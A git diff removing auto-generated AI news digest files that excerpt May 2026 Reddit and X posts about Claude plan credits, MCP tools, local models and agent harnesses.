guidance. * Tool Description: Snooze (delay and reason guidance) — Adds an explicit warning not to schedule short-interval wa… - ---- - -## [Context Is Not Control, a source-boundary eval for LLMs](https://reddit.com/r/LocalLLaMA/comments/1tcb4r7/context_is_not_control_a_sourceboundary_eval_for/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> I’ve released a short paper / eval write-up called Context Is Not Control. The core idea is simple, LLMs don’t only fail because they lack context, they also fail when they treat the wrong context as controlling evidence. A retrieved document, prior message, user framing, fake authority claim, stale policy, or injected instruction - all can enter the context window, but not everything in context should be allowed to govern the answer. That distinction is a source-boundary problem. The paper focuses on cases where a model sees multiple pieces of text but has to preserve the difference between: \* evidence \* user framing \* quoted material \* source text \* instruction-like contamination \* unsupported claims \* authoritative-looking but invalid context So the question, “did the model have enough context?”, instead becomes, “did the model correctly identify which context was admissible as evidence?” I think this is especially relevant to local/open model evaluation because it is a failure mode that can be tested across a spectrum of context formats. It’s also not dependent on frontier-model access. The paper is not claiming to solve hallucination. It makes a narrower argument that… - ---- - -## [What kinds of models are people training with document data? [P]](https://reddit.com/r/MachineLearning/comments/1tc92u9/what_kinds_of_models_are_people_training_with/) -*Reddit r/MachineLearning* | 13/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> We've helped some folks with synthetic data for a number of different projects and some of them for "document data". Like annotated PDFs, PNGs. Tax forms, health forms. Especially things with PII that are hard to get because of obvious privacy concerns. So, we came up with an engine to build a simulation and then extract the data from that simulation. We're trying to make sure our pipeline fits into a normal training pipeline, so I'm curious about your workflows or training pipelines. Today we output in formats consistent with FUNSD, BIO, YOLO (like v5 and higher), Donut, COCO, etc. Are we shooting for the right stuff, or are people training for something different that could use a different format or ontology or something? Other things we're trying to figure out are like is a PyPi SDK package useful, do people just use the API and not care, shut up and give me a zip file? :-) - ---- - -## [A new monthly Agent SDK credit for Claude plans](https://reddit.com/r/ClaudeAI/comments/1tc6nah/a_new_monthly_agent_sdk_credit_for_claude_plans/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Starting June 15, paid Claude plans can claim a dedicated monthly credit for programmatic usage. The credit covers usage of: * Claude Agent SDK * `claude -p` * Claude Code GitHub Actions * Third-party apps built on the Agent SDK We've heard your questions about SDK and `claude -p` usage sharing your subscription rate limits with Claude Code and chat. Starting June 15, programmatic usage gets its own dedicated budget instead. Your subscription limits don't change, they're now reserved for interactive use. How it works: Claim the monthly credit once, and programmatic usage will draw from it automatically. When it runs out, you can keep going with usage credits (billed at API rates you turn on/off). If usage credits are turned off, usage pauses until the credit resets. Monthly credit amounts vary by plan: * Pro: $20 * Max 5x: $100 * Max 20x: $200 * Team Standard: $20/seat * Team Premium: $100/seat * Enterprise: Varies by seat type After you claim the credit, it resets with each billing cycle. Credits do not rollover. This means that third-party tools built on the Agent SDK like Conductor and OpenClaw work with your Claude plan, but will draw from your credit the same way your own scr… - ---- - -## [Anthropic launches Claude For Legal with practice-area plugins and MCP connectors to nine major legal platforms](https://reddit.com/r/ClaudeAI/comments/1tbvje0/anthropic_launches_claude_for_legal_with/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: mcp, product_launch - -> Anthropic rolled out Claude For Legal (May 12), adding practice-area plugins for commercial, employment, privacy, product, corporate, and AI governance law. The release also includes MCP connectors to tools lawyers already use: DocuSign, Ironclad, iManage, NetDocuments, LexisNexis, Thomson Reuters, Box, Everlaw, and LSuite. This follows the same playbook as Claude for Creative Work from April. Anthropic seems to be systematically building vertical-specific connector ecosystems rather than shipping a general-purpose tool. Each launch bundles domain plugins with integrations into the professional software stack people already have open. Curious whether anyone in legal has tried the practice-area plugins yet, specifically how they compare to just prompting base Claude with domain context. Source: [https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html](https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html) - ---- - -## [A fully autonomous browser runtime for any AI agents](https://reddit.com/r/ClaudeAI/comments/1tbv937/a_fully_autonomous_browser_runtime_for_any_ai/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Built (with Claude) an open source, fully autonomous browser runtime for agents. One critical issue I faced (I guess most of us do) is the inability to have a robust web search feature and this will help you direct towards that goal I hope - this AgenticBrowser needs zero human intervention. If a human can access it, the agent accesses it. Approach it as an idea or a base to build better stuff - maybe you will think of something even better than this - I built this after working with various web-search features for the Agentic framework (Jork) that I built a couple of months back - thought instead of making it just a Power of Jork, could be helpful to make it independent so any agent built on any framework can use it. No third party stuff is needed. Please take a look and let me know: - ---- - -## [I built a native macOS app to manage Claude Code sessions, accounts, and projects](https://reddit.com/r/ClaudeAI/comments/1tbtpl2/i_built_a_native_macos_app_to_manage_claude_code/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: cli_tool, tool_update - -> I've been using Claude Code daily for months and kept running into the same friction — juggling multiple terminal tabs for different projects, getting rate limited and manually switching accounts, losing work when I forgot to commit. So I built Claudy — a native macOS wrapper around Claude Code that handles all of that: * Multi-session: run multiple Claude Code sessions side by side with a proper sidebar * Auto account switching: when you hit the usage limit, it switches to another account automatically * Draft Commits: checkpoint your work mid-session and restore it anytime * Marketplace: install Skills, MCPs, and Commands in one click Built with SwiftUI + SwiftData, using libghostty (Ghostty's terminal core) for the terminal emulator. Just launched on Product Hunt today if anyone wants to check it out: [https://www.producthunt.com/products/claudy?launch=claudy](https://www.producthunt.com/products/claudy?launch=claudy) Happy to answer any questions about the build or the features! - ---- - -## [Fast mode for Claude Opus 4.7 is now available on the api.](https://x.com/DailyXplorer/status/2054464151234228372) -*X search / AI model updates* | 13/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Fast mode for Claude Opus 4.7 is now available on the api. - ---- - -## [Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI t…](https://x.com/jiaweihq/status/2054463419722707134) -*X search / Agent workflows* | 13/05/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI tool, framework, and MCP server worth - ---- - -## [Local AI video pipeline review: Qwen3 27B beat Gemma 4 26B for tool calling](https://reddit.com/r/LocalLLaMA/comments/1tbof8k/local_ai_video_pipeline_review_qwen3_27b_beat/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> Watched All About AI's 100% local Fireship-style video automation experiment over the weekend (link in comments). A few things worth flagging if you're trying the same stack. Tool calling reliability was where the two diverged. Gemma 4 26B kept getting stuck in tool-call loops on his rig. Qwen 3.6 27B handled the same orchestration cleanly, no wasted thinking tokens. That gap is bigger than benchmark numbers suggest once you push real agent workflows through it. For images he ran Said Image Turbo locally off Hugging Face. Open weights, no API spend. Solid for meme-style cards. Portrait shots are where you'd probably reach for a Flux or Seedream call instead. Orchestration was OpenCode end-to-end. Context window climbed to 174K tokens and the to-do list wasn't fully completed in one shot. He stepped away from the rig mid-run and came back to a partial result, which is honestly the realistic version of "AI did the work for me". For people not wanting to run a 27B model locally, Qwen3 family is on a few inference providers so the API path keeps the same weights without the GPU upfront. Tool-call behavior holds since the model is the same. If you've benchmarked Qwen3 tool-calling fail… - ---- - -## [I built a local GUI + AI builder for creating ComfyUI custom node packs](https://reddit.com/r/StableDiffusion/comments/1tbk8zv/i_built_a_local_gui_ai_builder_for_creating/) -*Reddit r/StableDiffusion* | 13/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> I've been working on ComfyUI Node Builder, a local app for building custom ComfyUI nodes without hand-writing all the boilerplate every time. The demo shows: 1. user describes a node idea 2. AI creates the node contract and Python 3. dependencies/files are updated 4. the pack is deployed and tested in ComfyUI It is open-source and local. The AI Builder can create nodes, edit generated files, explain validation errors, run checks, and request deploy only when deploy permission is enabled. GitHub: https://github.com/caoool/comfyui-node-canvas Landing page: https://caoool.github.io/comfyui-node-canvas/ Node ideas and feedback: https://github.com/caoool/comfyui-node-canvas/issues/2 I'd especially like feedback from people who build custom nodes: what node authoring workflow should this support next? - ---- - diff --git a/data/digest-2026-05-14.md b/data/digest-2026-05-14.md deleted file mode 100644 index c62ad7a..0000000 --- a/data/digest-2026-05-14.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-14** | 15 stories | Auto-generated from 592 archived stories - ---- - -## [The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.](https://x.com/OpenAIDevs/status/2051725072873001338) -*X / @openaidevs* | 05/05/2026 | Score: 1.00 -Tags: api_update, product_launch, open_source, developer_tool, tool_update - -> The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in. - ---- - -## [Computer-use MCP that can control multiple machines (Integrate with claude, Cursor, Codex or your custom harness)](https://reddit.com/r/LocalLLaMA/comments/1tcpgsv/computeruse_mcp_that_can_control_multiple/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: mcp, open_source, agent_tool - -> Hey everyone, We built opendesk: it lets AI agents control your desktop using computer use MCP that can integrate with your custom workflow. Today we shipped something a bit wild: Your AI can now see, click, type, and navigate on a completely different computer, over your WiFi. You can pair them once and your agent can control it all from a single conversation. No cloud, account login, or servers in the middle. Everything stays on your local network, fully encrypted. Free and open source — Mac, Linux, and Windows. [github.com/vitalops/opendesk](http://github.com/vitalops/opendesk) Happy to answer any questions! - ---- - -## [Simpler self hosted alt to Open WebUI](https://reddit.com/r/LocalLLaMA/comments/1tciwwt/simpler_self_hosted_alt_to_open_webui/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, tool_update - -> Got Qwen3.6 27B running on my newly assembled 4x 3090 rig (s/o 3090-club) and I'm trying to get the people in my house to adopt the local workflow. Open WebUI has improved a lot in the recent updates, but I still found it pretty rough for non-technical people. It often feels more like a dev tool than a self-hosted ChatGPT-style app that "just works". I built overtchat to focus mainly on getting the core chat experience right: a polished ui, simple setup and fewer moving parts. The goal is not to compete on agentic workflow with LibreChat/LobeChat/OWUI but to provide a cleaner self-hosted interface for local models. Ships with its own tried & tested searxng config for web search, kokoro tts (no api keys needed). Single docker compose file. MIT licensed of course, no telemetry. Optimized for mobile as PWA. [Github](https://github.com/yoloyash/overtchat). Also being upfront - I write code for a living and have been actively reviewing/debugging/changing things, but I did use quite a lot of AI lol. I promise it's not slop tho 😿 . Feedback is welcome! - ---- - -## [My AI runs 24/7 on Claude Code without -p. Here's the hook to do it yourself.](https://reddit.com/r/ClaudeAI/comments/1tcicvb/my_ai_runs_247_on_claude_code_without_p_heres_the/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: api_update, product_launch, developer_tool - -> **Saw the thread about the June 15 credit change. Built a drop-in `-p` replacement using hooks — no SDK credits needed.** edit: 29 stars! my first real repo \o/ A lot of people are upset about losing subsidized `-p` usage. I built something that gives you the same stateless, one-message-at-a-time behavior — but in interactive mode, on your regular subscription. **How it works:** 1. A supervisor launches Claude Code in interactive mode 2. A stop hook polls an inbox file for new messages 3. When a message arrives, the hook injects it — **one message per session** 4. The agent processes it and writes a response to an outbox file 5. The supervisor kills the session and restarts with **fresh context** 6. Next message gets a clean session — true stateless operation, like `-p` When idle, the hook polls internally and blocks with minimal ticks (~20 tokens each). No context inflation from idle waiting. **What you get:** - **Stateless per message** — each task gets fresh context, just like `-p` - **No SDK credits** — interactive mode uses your subscription - **Autonomous** — watches inbox, processes messages, writes responses - **Cheap idle** — minimal token overhead while waiting for work… - ---- - -## [[N] LangChain Interrupt 2026 announcements [N]](https://reddit.com/r/MachineLearning/comments/1td4v0a/n_langchain_interrupt_2026_announcements_n/) -*Reddit r/MachineLearning* | 14/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> LangChain just wrapped Day 1 of Interrupt 2026 and announced a few things worth knowing about: **SmithDB** — A purpose-built distributed database for agent observability. The problem they're solving: agent traces are getting too large and complex for general-purpose databases. SmithDB is built with Rust, Apache DataFusion, and Vortex, designed specifically for multimodal content and long-span tracing. They're reporting P50 latency of 92ms for loading trace trees and 400ms for full-text search, with up to 12x speedup over previous LangSmith performance. Architecture is object storage + small Postgres metadata store + stateless services, so it scales elastically and can be self-hosted. **Context Hub** — A centralized system for managing agent context (AGENTS.md files, skills, policies, memory) in LangSmith. The interesting part is they're working with MongoDB, Pinecone, Elastic, and Redis on an open standard for agent memory — covering episodic, semantic, and procedural memory with versioning and portability across frameworks. **Deep Agents v0.6** — New release includes ContextHubBackend integration, an installable code interpreter that gives agents a programmable workspace inside t… - ---- - -## [A VERY lightweight open web-search tool for smaller local LLMs](https://reddit.com/r/LocalLLaMA/comments/1tczzga/a_very_lightweight_open_websearch_tool_for/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: mcp, open_source - -> Hey everyone, Been playing around with local agent setups lately, mostly Cline/Roo with smaller models, and web search kept annoying me. Not because it doesn’t work, but because it usually throws way too much random page text into the context. small models really don’t handle that gracefully lol. they start with a simple search and suddenly half the prompt is scraped garbage. So I built bad boy, TinySearch. It’s a small open-source MCP tool that does web search, crawls a few pages, chunks/retrieves/reranks the useful bits, and gives the agent a much smaller context blob instead of dumping full pages. Repo: [https://github.com/MarcellM01/TinySearch](https://github.com/MarcellM01/TinySearch) Uses DuckDuckGo, Crawl4AI, dense + BM25-style retrieval, reranking, MCP, and it can also run as a FastAPI server. On my setup (M4 Mac and old ahh lenovo thinkpad) it usually takes around 5–12 seconds end to end, depending on the query/machine Not trying to replace real search infra or anything. it’s more just a little local research layer for people building agents who don’t want to spin up a whole backend just to let the model look stuff up. Still rough in places, but it’s been useful enough fo… - ---- - -## [Stable Diffusion WebUI Forge for AMD GPU](https://reddit.com/r/StableDiffusion/comments/1tcyyb4/stable_diffusion_webui_forge_for_amd_gpu/) -*Reddit r/StableDiffusion* | 14/05/2026 | Score: 1.00 -Tags: product_launch, developer_tool - -> It was a f\*cking chore that took almost 9 hours but i was able to FINALLLLLY MAKE IT !!!! I´ve reached it ! So... i am gonna share the files that made it possible. "Proof pics" "[https://github.com/lllyasviel/stable-diffusion-webui-forge](https://github.com/lllyasviel/stable-diffusion-webui-forge)" *The link should look like this* [\>>> Click Here to Download One-Click Package (CUDA 12.1 + Pytorch 2.3.1) <<<](https://github.com/lllyasviel/stable-diffusion-webui-forge/releases/download/latest/webui_forge_cu121_torch231.7z) Once its done click on extract into a folder... There click on update.bat.... then from there find all the files "down bellow in the picture" see what the files are and then either download the google drive links or copy paste the text i wrote down on facebook link and delete the original. Then u gotta click thru the webui-user.bat , webui.bat and run.bat... I have no clue in what order though ... good luck xd https://preview.redd.it/pvx8zl18m31h1.png?width=1920&format=png&auto=webp&s=8d5f9e3ba9fd355f0f9fffff89cfae57f3bef293 [copy and paste it all into these files till u see these \\"\_\_\_\_\_\_\_\_\_\_\_\\" in case u are copying i… - ---- - -## [Max20 user: anyone running Opus 4.7 as orchestrator + DeepSeek V4 as the worker via OpenRouter?](https://reddit.com/r/ClaudeAI/comments/1tcvngy/max20_user_anyone_running_opus_47_as_orchestrator/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> I'm on the Max20 plan, thinking about a setup before I sink time into it. Want to hear from anyone actually running it, not theorycraft. **The idea:** Opus 4.7 in Claude Code as the orchestrator. It plans, breaks down tasks, reviews code quality, catches mistakes. The actual implementation, the bulk token spend, gets delegated to DeepSeek V4 Pro through OpenRouter. DeepSeek lands credibly close to Opus 4.7 on agentic coding benchmarks at a fraction of the output-token cost, so the bet is: keep Opus for the judgment-heavy parts, don't burn it on routine implementation. **I'm not expecting huge savings.** Realistically maybe an extra 30% (guessing here) effective Opus headroom if delegation works cleanly, and even less margin now that the limits situation has loosened a bit. So part of the question is genuinely whether 30% is worth the integration friction at all, or whether it's a fun idea that doesn't pay for itself. **Pre-empting the obvious responses, because I've already thought about these:** * *"Just use Sonnet for the cheap parts."* The easy answer. But I'm specifically curious whether an external model's cost delta beats the friction, and whether anyone's actually measured… - ---- - -## [Automated AI researcher running locally with llama.cpp](https://reddit.com/r/LocalLLaMA/comments/1tcu5r8/automated_ai_researcher_running_locally_with/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hi everyone, I'm happy to share ml-intern, which is a harness for agents to have tighter integration with Hugging Face's open-source libraries (transformers, datasets, trl, etc) and Hub infrastructure: [https://github.com/huggingface/ml-intern](https://github.com/huggingface/ml-intern) The harness is quite simple (basically tools + system prompt) and we built it initially for Claude Opus. However, now that open models are getting really good at agentic workflows, I just added support for running ml-intern with local models via llama.cpp or ollama. As you can see in the video, Qwen3.6-35B-A3B is able to SFT a model end-to-end by orchestrating CPU/GPU sandboxes and jobs on the Hub. I find this pretty neat because we can now have an AI researcher running 24/7 on a laptop, without maxing out token limits :) Anyway, I hope this is useful to the community and please let me know if there are any features that you'd like us to include. - ---- - -## [OpenAI's deployment company move says more about the AI gap than any benchmark[D]](https://reddit.com/r/MachineLearning/comments/1tcsnng/openais_deployment_company_move_says_more_about/) -*Reddit r/MachineLearning* | 14/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> OpenAI launched a deployment company with $4B initial investment, 19 partner organizations, and acquired Tomoro (UK-based AI consultancy, \~150 engineers). The pitch: embed "Forward Deployed Engineers" into enterprises to help them actually use AI. This is basically the Palantir playbook. Send engineers into complex organizations, build deep integrations, become infrastructure. But the reason OpenAI is doing this tells you something uncomfortable: the gap between "model capability" and "production deployment" is widening, not closing. Over a million enterprises have adopted OpenAI products. But adoption and deployment are different things. Enterprises can sign up for an API key without having any workflow that actually benefits from it. The model gets better every quarter but the integration work stays hard. Daybreak (their new security product) is interesting but feels like a separate conversation. The deployment company is the signal. When the leading model company decides it needs its own consulting arm, it's acknowledging that selling API access isn't enough. The last mile is still human-intensive, context-specific, and resistant to automation. For the ML community this should… - ---- - -## [You're abusing your subscription with agentic 24/7 workflows and that's why we all get restrictions and limits](https://reddit.com/r/ClaudeAI/comments/1tcpxi2/youre_abusing_your_subscription_with_agentic_247/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Subscription tiers were designed around interactive human use, but autonomous loops changed the usage. It makes sense that companies separate autonomous work from subscriptions. You and I know that when these tiers with these prices were introduced, agentic workflows were nowhere near where they are now. The past half a year has introduced everything from OpenClaw to Ralph loops to multi-agent orchestration and long-running autonomous tasks. All build on the previous ones, making the autonomous work longer, and minimising the time we're interacting with the AI while maximising the output. Do everyday users (the people the lower tiers of these subscriptions are meant for) need automatically running autonomous agents in scales? Some do, but rarely. The same people that use services like Agent SDK likely do it for work or income, optimise for maximum token burn for their buck, and as a result that non-interactive usage ends up balancing the subscription token limits lower. This of course leads to Anthropic seeking solutions for the outliers that burn so much they affect the limits for the gauss middle of the subscriber base. Seeing people now publishing workarounds instead of going A… - ---- - -## [I tested GPT-5.5 Codex against Opus 4.7 Claude Code, and it's about time Anthropic bros take pricing seriously.](https://reddit.com/r/ClaudeAI/comments/1tcpe8y/i_tested_gpt55_codex_against_opus_47_claude_code/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> I've used Claude Code the most among AI coding agents. Sonnet, Opus, I've run them all. The reason is simple: they're beasts at tool execution and prompt following. That's also why Anthropic dominates API revenue from code agents. First-mover advantage is real, and developers love them. But GPT-5.5 Codex has been insanely good. When new models drop, I run real tests, not benchmarks. This time I built two tasks: Test 1: PR triage bot – GitHub MCP, scoring formula, Slack alerts, retries, strict TS, no "any". Test 2: Real-time code review UI – React, WebSockets, optimistic rollback, virtualized diff, WS reconnect. Same prompts. Same MCP (GitHub + Slack). Same machine. Here's what I found out: Claude Code (Opus 4.7): \- Verified MCP before writing a line \- Built 36 files in 12 minutes \- Wrote its own WebSocket smoke test (3ms broadcast) \- Zero errors first run \- Total cost: \~$2.50 Codex (GPT-5.5 via Cursor): \- Failed Task 1 (GitHub MCP not reachable – Cursor environment issue, not model) \- Task 2 shipped but needed a patch for infinite React loop \- 28 files, more compact architecture \- Total cost: \~$2.04 (18% cheaper) Claude shipped cleaner. Codex needed a patch pass. For co… - ---- - -## [Last week in Generative Image & Video](https://reddit.com/r/StableDiffusion/comments/1tcnpxj/last_week_in_generative_image_video/) -*Reddit r/StableDiffusion* | 14/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: \- CausalCine — Interactive autoregressive framework for multi-shot video narratives. Content-Aware Memory Routing retrieves historical KV entries by attention relevance instead of temporal proximity, solving motion stagnation and semantic drift in long-rollout generation. Distilled to a few-step generator for real-time use. https://reddit.com/link/1tcnpxj/video/tbryyz3s611h1/player [Paper](http://arxiv.org/abs/2605.12496v1) | [GitHub](https://github.com/yihao-meng/CausalCine) \- SwiftI2V — Efficient 2K image-to-video generation. Low-res motion drafting followed by high-res refinement while preserving source image detail. https://reddit.com/link/1tcnpxj/video/8n6t3ust611h1/player [Paper](https://arxiv.org/abs/2605.06356) | [GitHub](https://github.com/hkust-longgroup/SwiftI2V) | [Project Page](https://hkust-longgroup.github.io/SwiftI2V/) \- OmniGen2 — Unified image generation model handling text-to-image, editing, subject-driven generation, and visual conditions in one architecture. | [Paper](http://arxiv.org/abs/2605.07254v1) https://preview.redd.it/iimjl0d2711h1.png?… - ---- - -## [Fully Realtime Interaction Models](https://reddit.com/r/LocalLLaMA/comments/1tckrpt/fully_realtime_interaction_models/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> I know this model isn't open weights, and when it does drop it'll be over api, but I'm just posting to say the very MICROsecond that this drops you already know me and probably a bunch of other people are going to create an insane amount of distill data from the api. because at least to me the very idea of a model that has complete ability to act on it's own accord is fascinating. I'm referencing this: [https://thinkingmachines.ai/blog/interaction-models/](https://thinkingmachines.ai/blog/interaction-models/) - ---- - -## [Open-source, self-updating wiki for your codebase](https://reddit.com/r/ClaudeAI/comments/1tcjv9b/opensource_selfupdating_wiki_for_your_codebase/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> I got tired of re-explaining the same codebase context to coding agents. Stuff like: “we tried moving auth into middleware, but backed it out because it broke OAuth callbacks,” or “that weird retry logic exists because Stripe webhooks arrive out of order.” So I built Almanac. It gives your coding agent a self-updating wiki for the codebase. It updates from your repo, and conversations you havewith Claude Code/Codex. The wiki lives locally in your repo as markdown. You can read it yourself, but the main consumer is the agent. It’s free and open source. Currently only MacOS (would add a windows support if people find it useful) GitHub: [https://github.com/AlmanacCode/codealmanac](https://github.com/AlmanacCode/codealmanac) Curious how other people are handling project context for long-running AI coding work. - ---- - diff --git a/data/digest-2026-05-15.md b/data/digest-2026-05-15.md deleted file mode 100644 index 6efc82d..0000000 --- a/data/digest-2026-05-15.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-15** | 15 stories | Auto-generated from 629 archived stories - ---- - -## [Got Claude Max from office for VS Code usage — what’s the best setup, workflow, and hidden tricks?](https://reddit.com/r/ClaudeAI/comments/1te36bt/got_claude_max_from_office_for_vs_code_usage/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, mcp, tool_update - -> Our office recently gave us access to Claude Max plan, mainly for using inside Visual Studio Code VS Code. I mostly work on web development, debugging, refactoring, API integration, SQL queries, and large codebase understanding. Right now I’m just using it like a normal chatbot, so I feel like I’m massively underusing it 😅 Wanted to know from experienced users: What’s your best VS Code setup with Claude? Any must-have extensions/tools/workflows? Best way to handle large repositories/context limits? How do you structure prompts for better code output? Any tricks for debugging, refactoring, architecture planning, or documentation generation? Is MCP worth setting up? If yes, what servers/tools are actually useful? Any productivity hacks most beginners don’t know? Would love to hear real-world workflows instead of generic AI tips. - ---- - -## [I built a free Google search MCP that actually works(searching, fetching, with PDF)](https://reddit.com/r/ClaudeAI/comments/1tdw4us/i_built_a_free_google_search_mcp_that_actually/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> ✅ Actually works (tested 6 free MCPs, all failed) ✅ Search + URL extract in one MCP (replaces the usual search MCP + fetch MCP combo) ✅ Academic PDFs auto-handled (arxiv / biorxiv / Nature / OpenReview / NeurIPS / JMLR / PMLR / Springer / PubMed→PMC) ✅ Tiered extraction: `mode: "abstract"` returns \~1500 chars per result for cheap relevance triage before paying for full bodies ✅ Auto-bootstrap on first run (no manual `npm run bootstrap` step anymore) ✅ Auto CAPTCHA recovery (Chrome opens, human solves once, retries) ✅ No API key, no proxies, no solver **4 tools** * `search` SERP only * `search_parallel` N queries concurrently * `extract(url, mode?)` `full` / `abstract` / `metadata`. PDF detected via Content-Type, `%PDF` magic, `citation_pdf_url` meta, and per-domain rules * `search_extract(query, mode?)` defaults to `abstract`, so a 5-result survey costs \~7.5k chars instead of 40k **Why abstract mode** The old `search_extract` always fetched full bodies great for one URL, wasteful when you just want to know which of 5 results is worth reading. Abstract mode pulls PDF page 1 or HTML meta description (\~1500 chars), letting the agent triage relevance, then call `extract` with `mode… - ---- - -## [Claude for Healthcare launched in January — but medical imaging is the obvious gap. Anyone else noticing?](https://reddit.com/r/ClaudeAI/comments/1te160m/claude_for_healthcare_launched_in_january_but/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> I’m a radiology resident in Istanbul, also building medical AI fine-tunes on the side (bone age estimation, fluoroscopy catheter orientation, a Turkish radiology report LLM). When Claude for Healthcare launched in January, I dug into the announcement. The architecture is impressive — CMS, ICD-10, PubMed connectors, HIPAA infrastructure, prior auth and chart review workflows. But it’s entirely text + workflow. Zero imaging. This is interesting because radiology is arguably where medical AI has the most mature, FDA-cleared products today. Yet Claude’s healthcare push doesn’t touch it. Two reads: 1. Strategic choice — Anthropic is betting on orchestration over vertical vision models. The expectation might be: Claude orchestrates, external vision specialists (MedGemma, proprietary models) get called as tools/MCP servers. 2. Genuine gap — imaging just isn’t on the roadmap yet. Either way, the imaging-as-MCP-server pattern feels underexplored. Anyone building in this direction? Especially curious if anyone’s exposed a fine-tuned medical vision model as an MCP server that Claude can call. - ---- - -## [Am I stupid for pivoting to Transparency with Agents over Memory after 6 months?](https://reddit.com/r/ClaudeAI/comments/1tdxi6r/am_i_stupid_for_pivoting_to_transparency_with/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> built an open source memory layer for ai agents. thought the obvious feature people would care about was persistent memory across restarts and shared memory between agents. that was the whole pitch. few months of actual user data in. most of the api calls aren't about memory at all. they're hitting the audit trail (what did the agent do and when), the loop detector (catching when an agent is stuck doing the same thing 20 times in a row), and the per-agent performance dashboard (which agent is wasting tokens, which one keeps crashing, who's drifting off goal). basically people don't really care that their agent remembers stuff across restarts. they care that they can see what it did and pull the plug when it goes off the rails. so i'm wondering if i should just flip the pitch. lead with "observability and accountability for ai agents" instead of "memory for ai agents". memory is table stakes at this point and mem0/zep already dominate that framing. loop detection + audit trail + performance scoring per agent feels like open territory. am i stupid? or is this the obvious move i somehow missed for 3 months - ---- - -## [I gave Claude Code a microphone via MCP. Now it asks me questions before writing code.](https://reddit.com/r/ClaudeAI/comments/1tdupsr/i_gave_claude_code_a_microphone_via_mcp_now_it/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> There are already a lot of dictation apps that let you skip typing when prompting Claude. You speak, they transcribe, and your prompt appears in the text box. But I wanted to try something different: what if Claude Code could ask for voice input by itself? So I gave Claude Code a microphone via MCP. Now Claude can ask a follow-up question when it needs more context, I answer by voice, and it continues the task with that context. It’s similar to those tool calls where Claude asks you to pick an option, but instead of choosing from a menu, you can just answer naturally by voice. I added this to my macOS dictation app, Spokenly. It runs a local MCP server, Claude connects to it, and Claude can call a tool to request voice input. Spokenly can also read Claude’s questions out loud with TTS, so it feels more like a real back-and-forth. It’s **completely free** with local models and your own API keys. Download: [https://spokenly.app/download](https://spokenly.app/download) If anyone tries it with Claude Code, I’d love to hear your feedback. - ---- - -## [Built a tool that publishes HTML artifacts securely behind company auth](https://reddit.com/r/ClaudeAI/comments/1tdudtk/built_a_tool_that_publishes_html_artifacts/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> Hey! Built [display.dev](http://display.dev) with a friend to make sharing Claude-generated HTML artifacts secure and easy between teammembers. Basically, it lets agents publish artifacts, you get back a URL. Your teammates can access it via Google/Microsoft SSO or with one-time passwords, and collaborate with inline comments. Works in CLI, or via MCP or web app. It's first purpose is to help teams collaborate better, but it's also useful for people who just want to share their artifacts with the public (optional visibility setting), or consultants/freelancers who want to share their work with clients. For larger teams, there are neat features like audit logs and stats, too. Anyway, let me know what you think - there's a free tier, of course. - ---- - -## [Anthropic built the agentic features. Now they're billing them separately.](https://reddit.com/r/ClaudeAI/comments/1tdjx4f/anthropic_built_the_agentic_features_now_theyre/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Starting June 15, Claude subscribers get a separate monthly 